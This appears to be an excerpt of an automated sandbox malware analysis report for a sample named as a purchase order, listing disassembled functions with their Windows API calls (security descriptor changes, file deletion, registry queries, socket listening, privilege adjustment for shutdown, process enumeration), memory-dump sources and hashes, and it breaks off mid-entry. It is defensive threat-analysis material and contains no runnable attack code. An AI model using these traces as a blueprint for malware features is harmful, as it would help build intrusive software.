                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB49A
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB4B7
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB4C6
                      • HeapAlloc.KERNEL32(00000000), ref: 00ACB4CD
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB4EE
                      • CopySid.ADVAPI32(00000000), ref: 00ACB4F5
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB526
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB54C
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB560
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: d8d61d0cea7e1250b9b977454caddfd331dd73ee384ef76deb08be186b3e1136
                      • Instruction ID: edc7c5d35c98157531a4db0f8736b7111a8211bf1cc9b3f712cd3982697eba45
                      • Opcode Fuzzy Hash: d8d61d0cea7e1250b9b977454caddfd331dd73ee384ef76deb08be186b3e1136
                      • Instruction Fuzzy Hash: 03513A75910209ABDF04DFA5DC5AEEEBB79FF08300F05812DE916A7291DB369A05CB60
                      Function 00AD6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                        • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                      • _wcscat.LIBCMT ref: 00AD6E7E
                      • __wsplitpath.LIBCMT ref: 00AD6E99
                      • FindFirstFileW.KERNEL32(?,?), ref: 00AD6EAE
                      • _wcscpy.LIBCMT ref: 00AD6EDD
                      • _wcscat.LIBCMT ref: 00AD6EEF
                      • _wcscat.LIBCMT ref: 00AD6F01
                      • DeleteFileW.KERNEL32(?), ref: 00AD6F0E
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6F22
                      • FindClose.KERNEL32(00000000), ref: 00AD6F3D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                      • String ID: \*.*
                      • API String ID: 2643075503-1173974218
                      • Opcode ID: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                      • Instruction ID: 15b48c53930a1b954a087b231504f4b589ab9228447fdd67d57ac1024e6f865d
                      • Opcode Fuzzy Hash: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                      • Instruction Fuzzy Hash: D321BF72409384AAC610EBA098849DBBBEC9B99314F444E1BF5D5C3152EB34D60D87A2
                      Function 00A95D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                      • API String ID: 0-2893523900
                      • Opcode ID: c221ea166262743d09dfeb16418c88996ce8676b214c2bc42bd2d2517efa610b
                      • Instruction ID: d52784f377abacd1f26a343ae7f1f024e4b032b043fabb28751962423d6661e3
                      • Opcode Fuzzy Hash: c221ea166262743d09dfeb16418c88996ce8676b214c2bc42bd2d2517efa610b
                      • Instruction Fuzzy Hash: 9F624071E002159BDF24CF59C8817EEB7F5EF48710F6481AAE855EB281EB749E81CB90
                      Function 00AF30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF317F
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AF321E
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AF32B6
                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AF34F5
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF3502
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                      • String ID:
                      • API String ID: 1240663315-0
                      • Opcode ID: ee52ec3da09908981546254f22186bbacd6b1bc4420a1dbe0fdefa3c582c56a0
                      • Instruction ID: 299079c357680e1b21383c3011c7000e0ade67cf8e5f25a2072b0b6b3061223c
                      • Opcode Fuzzy Hash: ee52ec3da09908981546254f22186bbacd6b1bc4420a1dbe0fdefa3c582c56a0
                      • Instruction Fuzzy Hash: 3DE17B35204204AFCB15DF68C995E2ABBF8EF89314F04896DF54ADB261DB30EE41CB52
                      Function 00AE7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: a1572147474c742bf4f4c8528647c05639632c3980811f72017185fb13f4bb3c
                      • Instruction ID: 9c30609ba24ee1f31221277024618338d60315d870c1a2a044e5ac371205b05e
                      • Opcode Fuzzy Hash: a1572147474c742bf4f4c8528647c05639632c3980811f72017185fb13f4bb3c
                      • Instruction Fuzzy Hash: 9021AE31704212AFDB10AF65DD59BAE7BA8EF44721F44801AF90ADB2A1DF74ED409B90
                      Function 00AEC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00ACA857: CLSIDFromProgID.OLE32 ref: 00ACA874
                        • Part of subcall function 00ACA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 00ACA88F
                        • Part of subcall function 00ACA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                        • Part of subcall function 00ACA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00ACA8AD
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00AEC6AD
                      • _memset.LIBCMT ref: 00AEC6BA
                      • _memset.LIBCMT ref: 00AEC7D8
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00AEC804
                      • CoTaskMemFree.OLE32(?), ref: 00AEC80F
                      Strings
                      • NULL Pointer assignment, xrefs: 00AEC85D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                      • String ID: NULL Pointer assignment
                      • API String ID: 1300414916-2785691316
                      • Opcode ID: 2256cbc7b44b3b2cb078f0a72e914fe74c361b03c72a1a3b39f3f44b06e2e429
                      • Instruction ID: a4a38d484dd3c68db47421707660916ce6c0f1bc3341176d864a9a2bad6aa724
                      • Opcode Fuzzy Hash: 2256cbc7b44b3b2cb078f0a72e914fe74c361b03c72a1a3b39f3f44b06e2e429
                      • Instruction Fuzzy Hash: 6E913971D00218ABDF10DFA5DD81EDEBBB9EF08720F20416AF519A7291DB705A45CFA0
                      Function 00AE24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AE24F6
                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AE2526
                      • _wcscmp.LIBCMT ref: 00AE253A
                      • _wcscmp.LIBCMT ref: 00AE2555
                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AE25F3
                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AE2609
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                      • String ID: *.*
                      • API String ID: 713712311-438819550
                      • Opcode ID: c91eebde29c7d4454dab4149385f8b2e7db42fa3779c354a97a82daad0c298b7
                      • Instruction ID: 91514228ed72caecc0bad43c342b34c438d53d78cd16fb66df0075fb2c522243
                      • Opcode Fuzzy Hash: c91eebde29c7d4454dab4149385f8b2e7db42fa3779c354a97a82daad0c298b7
                      • Instruction Fuzzy Hash: 9F417B7190025AAFCF21DFA5CD59BEEBBB8FF04310F244456E815A2191EB349A94CBA0
                      Function 00A98CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                      • API String ID: 0-1546025612
                      • Opcode ID: 81be9cf75494b5b0bd5b3ea9287fbae8047be7e1874056813af3a8d188328236
                      • Instruction ID: b27b09a7e2f74f9387977829f92c262a9f950da86f8fe1f67fb5cfb53380f32c
                      • Opcode Fuzzy Hash: 81be9cf75494b5b0bd5b3ea9287fbae8047be7e1874056813af3a8d188328236
                      • Instruction Fuzzy Hash: 78925C75E0021A9BDF24CF58C8807EEBBF1FB54314F6442AAD81AAB284D7749DC1CB91
                      Function 00A98530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 99c28cef3105391e63f19319b975435e5652a40728bb26ddb6f59a7de3860c64
                      • Instruction ID: a568cd564808ca3891e66195fa6ce8470af11f12e46b171ab80dec3bef141391
                      • Opcode Fuzzy Hash: 99c28cef3105391e63f19319b975435e5652a40728bb26ddb6f59a7de3860c64
                      • Instruction Fuzzy Hash: F3129B70A00609DFDF14DFA4DA85AAEB7F5FF48300F208569E806E7291EB35AE15CB50
                      Function 00AD82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                        • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                        • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                      • ExitWindowsEx.USER32(?,00000000), ref: 00AD830C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $@$SeShutdownPrivilege
                      • API String ID: 2234035333-194228
                      • Opcode ID: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                      • Instruction ID: 59feba3855613717be339bbe3f55665d5ca5fc3af73b2c9637a7064caf5c8426
                      • Opcode Fuzzy Hash: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                      • Instruction Fuzzy Hash: 8301A271B50315ABE768277C8C5BFFB7268AB05F80F140826F957EA2D2DE689C0081A4
                      Function 00AE91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                      Download Yara Rule
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00AE9235
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9244
                      • bind.WSOCK32(00000000,?,00000010), ref: 00AE9260
                      • listen.WSOCK32(00000000,00000005), ref: 00AE926F
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9289
                      • closesocket.WSOCK32(00000000), ref: 00AE929D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketlistensocket
                      • String ID:
                      • API String ID: 1279440585-0
                      • Opcode ID: 19dd2e70dffa61b083dcd124e1ef81c735b795969642a51495dc7c91cbcb5a18
                      • Instruction ID: 23824a676cadbd376b7fa6643dfa0c4602b0506ecf427cd048e644a6f5f7ce3a
                      • Opcode Fuzzy Hash: 19dd2e70dffa61b083dcd124e1ef81c735b795969642a51495dc7c91cbcb5a18
                      • Instruction Fuzzy Hash: A8218B35600600AFCB10EF68CA85BAEB7E9AF84324F108159FA56AB3D1CB74AD41CB51
                      Function 00AD6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AD6FAC
                      • __wsplitpath.LIBCMT ref: 00AD6FD0
                      • _wcscat.LIBCMT ref: 00AD6FE3
                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                      • String ID:
                      • API String ID: 1605983538-0
                      • Opcode ID: f002f50df738d5f94eea1be0117e97aacc75ba24d281825468d6c1346c340922
                      • Instruction ID: cf0f35cd6866d3fd80ef025bc0ec7380847a4d5d595a5ce65c88d0c399022193
                      • Opcode Fuzzy Hash: f002f50df738d5f94eea1be0117e97aacc75ba24d281825468d6c1346c340922
                      • Instruction Fuzzy Hash: D0218771904218ABDB11ABA0CD89BEEB7BCAB48300F5004EAF505E3241EB759F84DB60
                      Function 00A9A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • _memmove.LIBCMT ref: 00B03020
                      • _memmove.LIBCMT ref: 00B03135
                      • _memmove.LIBCMT ref: 00B031DC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID:
                      • API String ID: 1300846289-0
                      • Opcode ID: f05f297d5c816278b9f462c3d070022188303493ae5a2d6788703562d59e056b
                      • Instruction ID: 80e736e9c2e9e9b79c5b0359fb402f6d97b7a8010ed1bb6264a4d7c7d2392cb5
                      • Opcode Fuzzy Hash: f05f297d5c816278b9f462c3d070022188303493ae5a2d6788703562d59e056b
                      • Instruction Fuzzy Hash: 57029370A00205DFCF04DF68D985AAE7BF9EF59340F1480AAE806DB295EB31DE55CB91
                      Function 00AE96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AEACD3: inet_addr.WSOCK32(00000000), ref: 00AEACF5
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00AE973D
                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00AE9760
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLastinet_addrsocket
                      • String ID:
                      • API String ID: 4170576061-0
                      • Opcode ID: 1456ec76e49fe92d5001135c5b8920f2e48634185b8a0914d50a31385afce1a0
                      • Instruction ID: bdf8ab3a8073fa0ac72c4edd6d14a1fe2d5650c904eb99d59b8a77a18f62fc97
                      • Opcode Fuzzy Hash: 1456ec76e49fe92d5001135c5b8920f2e48634185b8a0914d50a31385afce1a0
                      • Instruction Fuzzy Hash: 8841E374A00200AFDB10AF28CE82E6E77EDEF49324F148458F956AB3D2CB749D418B91
                      Function 00ADF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00ADF37A
                      • _wcscmp.LIBCMT ref: 00ADF3AA
                      • _wcscmp.LIBCMT ref: 00ADF3BF
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ADF3D0
                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00ADF3FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNext
                      • String ID:
                      • API String ID: 2387731787-0
                      • Opcode ID: 1b4a248385336dda0f1982c4929732abdfac7d41e1a8b9780e8ccf6a8d248d67
                      • Instruction ID: 1c3c2c5c6d7236464aa7c6a7ab4d17f029aa046d9167ab69ac81c120d210134e
                      • Opcode Fuzzy Hash: 1b4a248385336dda0f1982c4929732abdfac7d41e1a8b9780e8ccf6a8d248d67
                      • Instruction Fuzzy Hash: CF419D756047029FCB08DF28C490E9AB3E8FF49324F10456EE96ACB3A1DB31A945CB91
                      Function 00AF20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AF20EC,?,00AF22E0), ref: 00AF2104
                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00AF2116
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
